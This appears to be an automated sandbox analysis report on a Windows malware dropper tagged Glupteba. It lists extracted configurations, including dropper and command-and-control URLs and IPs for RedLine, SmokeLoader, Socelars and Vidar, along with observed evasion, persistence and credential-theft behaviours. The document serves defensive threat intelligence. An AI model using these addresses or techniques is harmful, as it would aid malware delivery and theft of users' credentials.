glupteba | 66cfbe5f490fe56ff4b06df0cdeab9677fa4d9c134483270e72b132c6a86df9e

Analysis

max time kernel
69s
max time network
157s
platform
windows10-2004_x64
resource
win10v2004-en-20220112
submitted
10-03-2022 04:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

66cfbe5f490fe56ff4b06df0cdeab9677fa4d9c134483270e72b132c6a86df9e.exe
Size

7.7MB
MD5

8a2b326c35f1bc18ff65efcdaf80cf5d
SHA1

1baff7aa8779b5b25ddce494e14c5a6f7bff3cf5
SHA256

66cfbe5f490fe56ff4b06df0cdeab9677fa4d9c134483270e72b132c6a86df9e
SHA512

e2c04681976c67285bbe0009a3899769d25013ef257241aceb14267fd065441f89505385b0a4e76cca766e63f910e587bb639bf64672fa49671f1d54fd820b34

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.192/-RED/NAN.oo

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.192/-RED/NON.oo

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.192/-RED/RED.oo

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.xxhufdc.top/

http://www.uefhkice.xyz/

http://www.fcektsy.top/

https://sa-us-bucket.s3.us-east-2.amazonaws.com/asdhjk/

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/

rc4.i32

Extracted

Family

redline

Botnet

fdfsdf

86.107.197.196:63065

Attributes

auth_value
49c341b88f13528ba52befa3c6ca7ebb

Extracted

Family

redline

Botnet

jack

5.182.5.203:33873

Attributes

auth_value
6d03d90d7d897b871fe8bfcaec8c6ae0

Extracted

Family

vidar

Version

50.6

Botnet

937

https://mas.to/@s4msalo

https://koyu.space/@samsa2l

Attributes

profile_id
937

Extracted

Family

redline

Botnet

ruzki (check bio)

103.133.111.182:44839

Attributes

auth_value
767fa45398d3ac4a23de20d0480c2b03

Extracted

Family

redline

Botnet

Travis

5.182.5.22:33809

Attributes

auth_value
6fa3251b9d70327e7d1e5851c226af23

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 4 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3400-170-0x0000000001630000-0x0000000001F4E000-memory.dmp	family_glupteba
behavioral2/memory/3400-171-0x0000000000400000-0x0000000000D39000-memory.dmp	family_glupteba
behavioral2/memory/3248-176-0x0000000000400000-0x0000000000D39000-memory.dmp	family_glupteba
behavioral2/memory/3156-184-0x0000000000400000-0x0000000000D39000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4508 212 rundll32.exe
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4508	212	rundll32.exe

RedLine Payload 10 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3264-208-0x0000000000B90000-0x0000000000BB0000-memory.dmp	family_redline
behavioral2/memory/3008-235-0x0000000000640000-0x0000000000863000-memory.dmp	family_redline
behavioral2/memory/3008-250-0x0000000000640000-0x0000000000863000-memory.dmp	family_redline
behavioral2/memory/4784-276-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/3008-255-0x0000000000640000-0x0000000000863000-memory.dmp	family_redline
behavioral2/memory/332-248-0x00000000001F0000-0x0000000000411000-memory.dmp	family_redline
behavioral2/memory/332-241-0x00000000001F0000-0x0000000000411000-memory.dmp	family_redline
behavioral2/memory/332-234-0x00000000001F0000-0x0000000000411000-memory.dmp	family_redline
C:\Users\Admin\Pictures\Adobe Films\7PXiKrQsOIhS0rhaNrZpgW6i.exe	family_redline
C:\Users\Admin\Pictures\Adobe Films\7PXiKrQsOIhS0rhaNrZpgW6i.exe	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 4 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars
C:\Users\Admin\Pictures\Adobe Films\XaysnQMF_r4AeDffJia5F3r6.exe	family_socelars
C:\Users\Admin\Pictures\Adobe Films\XaysnQMF_r4AeDffJia5F3r6.exe	family_socelars

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

OnlyLogger Payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2984-242-0x0000000000400000-0x0000000000492000-memory.dmp	family_onlylogger

Vidar Stealer 2 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/3536-266-0x0000000000400000-0x0000000002EEE000-memory.dmp	family_vidar
behavioral2/memory/3536-281-0x0000000004BB0000-0x0000000004C5C000-memory.dmp	family_vidar

Downloads MZ/PE file

Executes dropped EXE 22 IoCs

Processes:

SoCleanInst.exemd9_1sjm.exeFolder.exeGraphics.exeUpdbdate.exeInstall.exeFiles.exepub2.exeFile.exejfiag3g_gg.exejfiag3g_gg.exeGraphics.execsrss.exeinjector.exedey0Iu8xI0ZErOCPX1EIEYmw.exeWerFault.exeuiMkC2Ifbm1YLxnukMnuf5oW.exertXw62iIgg78mS7VFHjXjsN_.exeR6jV2lhcb309fzMlP_QT9DSZ.exeXaysnQMF_r4AeDffJia5F3r6.exeanytime3.exe7PXiKrQsOIhS0rhaNrZpgW6i.exe

pid	process
1536	SoCleanInst.exe
872	md9_1sjm.exe
3124	Folder.exe
3400	Graphics.exe
2572	Updbdate.exe
1816	Install.exe
3280	Files.exe
3156	pub2.exe
384	File.exe
2300	jfiag3g_gg.exe
1088	jfiag3g_gg.exe
3248	Graphics.exe
3156	csrss.exe
2412	injector.exe
3664	dey0Iu8xI0ZErOCPX1EIEYmw.exe
1256	WerFault.exe
1916	uiMkC2Ifbm1YLxnukMnuf5oW.exe
2984	rtXw62iIgg78mS7VFHjXjsN_.exe
2160	R6jV2lhcb309fzMlP_QT9DSZ.exe
2896	XaysnQMF_r4AeDffJia5F3r6.exe
3456	anytime3.exe
3264	7PXiKrQsOIhS0rhaNrZpgW6i.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

UPX packed file 8 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\Pictures\Adobe Films\iKwrAoqyZUHZj9GIOmcqD3Nt.exe	upx
C:\Users\Admin\Pictures\Adobe Films\iKwrAoqyZUHZj9GIOmcqD3Nt.exe	upx
C:\Users\Admin\Pictures\Adobe Films\Yb8QqCngFlJTlMY6rUlJuXc8.exe	upx
C:\Users\Admin\Pictures\Adobe Films\Yb8QqCngFlJTlMY6rUlJuXc8.exe	upx

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

66cfbe5f490fe56ff4b06df0cdeab9677fa4d9c134483270e72b132c6a86df9e.exeFile.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	66cfbe5f490fe56ff4b06df0cdeab9677fa4d9c134483270e72b132c6a86df9e.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	File.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 3 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\Pictures\Adobe Films\ATOMu4Pz9VtYFn9QO4SD98Y4.exe	themida
behavioral2/memory/4136-257-0x00007FF6716E0000-0x00007FF671C8E000-memory.dmp	themida
behavioral2/memory/4136-252-0x00007FF6716E0000-0x00007FF671C8E000-memory.dmp	themida

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Files.exeGraphics.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.ex"	Files.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WanderingFirefly = "\"C:\\Windows\\rss\\csrss.exe\""	Graphics.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

md9_1sjm.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md9_1sjm.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

222 ipinfo.io
258 ipinfo.io
343 ipinfo.io
20 ip-api.com
112 ipinfo.io
113 ipinfo.io
220 ipinfo.io
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
Drops file in Windows directory 2 IoCs

Processes:

Graphics.exe

description ioc process

File opened for modification C:\Windows\rss Graphics.exe
File created C:\Windows\rss\csrss.exe Graphics.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md9_1sjm.exe

flow	ioc
222	ipinfo.io
258	ipinfo.io
343	ipinfo.io
20	ip-api.com
112	ipinfo.io
113	ipinfo.io
220	ipinfo.io

description	ioc	process
File opened for modification	C:\Windows\rss	Graphics.exe
File created	C:\Windows\rss\csrss.exe	Graphics.exe

Program crash 26 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
3352	3400	WerFault.exe	Graphics.exe
1324	3248	WerFault.exe	Graphics.exe
4688	1916	WerFault.exe	uiMkC2Ifbm1YLxnukMnuf5oW.exe
4748	2160	WerFault.exe	R6jV2lhcb309fzMlP_QT9DSZ.exe
4736	2672	WerFault.exe
4724	2160	WerFault.exe	R6jV2lhcb309fzMlP_QT9DSZ.exe
4632	2984	WerFault.exe
4828	1916	WerFault.exe	uiMkC2Ifbm1YLxnukMnuf5oW.exe
860	2984	WerFault.exe
4864	2672	WerFault.exe
1256	2984	WerFault.exe	rtXw62iIgg78mS7VFHjXjsN_.exe
4456	2984	WerFault.exe	rtXw62iIgg78mS7VFHjXjsN_.exe
3972	2984	WerFault.exe	rtXw62iIgg78mS7VFHjXjsN_.exe
3172	2984	WerFault.exe	rtXw62iIgg78mS7VFHjXjsN_.exe
4080	5068	WerFault.exe	_1PQqKhN2E1W5x5lOmQFRswz.exe
4560	2984	WerFault.exe	rtXw62iIgg78mS7VFHjXjsN_.exe
3172	5068	WerFault.exe	_1PQqKhN2E1W5x5lOmQFRswz.exe
1816	2984	WerFault.exe	rtXw62iIgg78mS7VFHjXjsN_.exe
2908	5068	WerFault.exe	_1PQqKhN2E1W5x5lOmQFRswz.exe
3220	2984	WerFault.exe	rtXw62iIgg78mS7VFHjXjsN_.exe
4928	5068	WerFault.exe	_1PQqKhN2E1W5x5lOmQFRswz.exe
2908	5068	WerFault.exe	_1PQqKhN2E1W5x5lOmQFRswz.exe
772	2192	WerFault.exe	rundll32.exe
2960	3456	WerFault.exe	anytime3.exe
5268	2780	WerFault.exe	anytime2.exe
5456	4676	WerFault.exe	bearvpn3.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

pub2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe

Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

4164 schtasks.exe
2252 schtasks.exe
3484 schtasks.exe
5344 schtasks.exe
388 schtasks.exe
Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

3444 timeout.exe
2996 timeout.exe
Kills process with taskkill 6 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

648 taskkill.exe
4712 taskkill.exe
4760 taskkill.exe
4664 taskkill.exe
3420 taskkill.exe
1816 taskkill.exe

pid	process
4164	schtasks.exe
2252	schtasks.exe
3484	schtasks.exe
5344	schtasks.exe
388	schtasks.exe

pid	process
3444	timeout.exe
2996	timeout.exe

pid	process
648	taskkill.exe
4712	taskkill.exe
4760	taskkill.exe
4664	taskkill.exe
3420	taskkill.exe
1816	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

Graphics.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2532 = "Chatham Islands Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2371 = "Easter Island Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1831 = "Russia TZ 2 Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3142 = "South Sudan Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1861 = "Russia TZ 6 Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2842 = "Saratov Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2411 = "Marquesas Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1871 = "Russia TZ 7 Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2412 = "Marquesas Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2891 = "Sudan Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2612 = "Bougainville Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2752 = "Tomsk Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1862 = "Russia TZ 6 Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2771 = "Omsk Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2321 = "Sakhalin Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2942 = "Sao Tome Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time"	Graphics.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

pub2.exejfiag3g_gg.exeGraphics.exeGraphics.exe

pid	process
3156	pub2.exe
3156	pub2.exe
1088	jfiag3g_gg.exe
1088	jfiag3g_gg.exe
3400	Graphics.exe
3400	Graphics.exe
2420
2420
2420
2420
2420
2420
2420
2420
2420
2420
2420
2420
2420
2420
2420
2420
2420
2420
2420
2420
2420
2420
2420
2420
2420
2420
2420
2420
2420
2420
2420
2420
2420
2420
2420
2420
2420
2420
2420
2420
2420
2420
2420
2420
2420
2420
2420
2420
2420
2420
3248	Graphics.exe
3248	Graphics.exe
2420
2420
3248	Graphics.exe
3248	Graphics.exe
3248	Graphics.exe
3248	Graphics.exe

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

csrss.exe

pid process

3156 csrss.exe

pid	process
3156	csrss.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Install.exeSoCleanInst.exetaskkill.exemd9_1sjm.exeGraphics.exeGraphics.execsrss.exeXaysnQMF_r4AeDffJia5F3r6.exe

description	pid	process
Token: SeCreateTokenPrivilege	1816	Install.exe
Token: SeAssignPrimaryTokenPrivilege	1816	Install.exe
Token: SeLockMemoryPrivilege	1816	Install.exe
Token: SeIncreaseQuotaPrivilege	1816	Install.exe
Token: SeMachineAccountPrivilege	1816	Install.exe
Token: SeTcbPrivilege	1816	Install.exe
Token: SeSecurityPrivilege	1816	Install.exe
Token: SeTakeOwnershipPrivilege	1816	Install.exe
Token: SeLoadDriverPrivilege	1816	Install.exe
Token: SeSystemProfilePrivilege	1816	Install.exe
Token: SeSystemtimePrivilege	1816	Install.exe
Token: SeProfSingleProcessPrivilege	1816	Install.exe
Token: SeIncBasePriorityPrivilege	1816	Install.exe
Token: SeCreatePagefilePrivilege	1816	Install.exe
Token: SeCreatePermanentPrivilege	1816	Install.exe
Token: SeBackupPrivilege	1816	Install.exe
Token: SeRestorePrivilege	1816	Install.exe
Token: SeShutdownPrivilege	1816	Install.exe
Token: SeDebugPrivilege	1816	Install.exe
Token: SeAuditPrivilege	1816	Install.exe
Token: SeSystemEnvironmentPrivilege	1816	Install.exe
Token: SeChangeNotifyPrivilege	1816	Install.exe
Token: SeRemoteShutdownPrivilege	1816	Install.exe
